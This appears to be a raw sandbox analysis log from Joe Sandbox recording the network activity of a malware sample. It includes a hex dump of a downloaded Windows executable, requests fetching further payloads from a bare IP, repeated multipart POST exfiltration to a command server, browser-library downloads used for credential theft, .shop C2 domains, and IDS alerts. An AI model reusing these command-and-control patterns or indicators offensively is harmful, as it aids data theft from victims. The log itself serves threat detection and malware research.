                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:13 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 58Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                                Source: Joe Sandbox ViewIP Address: 147.45.44.104 147.45.44.104
                                Source: Joe Sandbox ViewASN Name: AS-PUBMATICUS AS-PUBMATICUS
                                Source: Joe Sandbox ViewASN Name: LIFELINK-ASRU LIFELINK-ASRU
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: C:\ProgramData\AFHDGDGIID.exeDNS query: name: api.ipify.org
                                Source: C:\ProgramData\AFHDGDGIID.exeDNS query: name: api.ipify.org
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49759 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49762 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49758 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49760 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49765 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49764 -> 147.45.44.104:80
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49769 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49772 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49775 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49789 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49790 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49788 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49787 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49793 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49791 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 104.26.13.205:80
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49792 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49794 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49795 -> 5.75.211.162:443
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 7181Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGHDAECBFHJKEGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCFBAEGDHIEBFHDGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 98737Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wallkedsleeoi.shop
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFIIJDAAAAKFHIDAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGCGDHJEGHJKFHJJJKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 7153Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 5785Connection: Keep-AliveCache-Control: no-cache
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
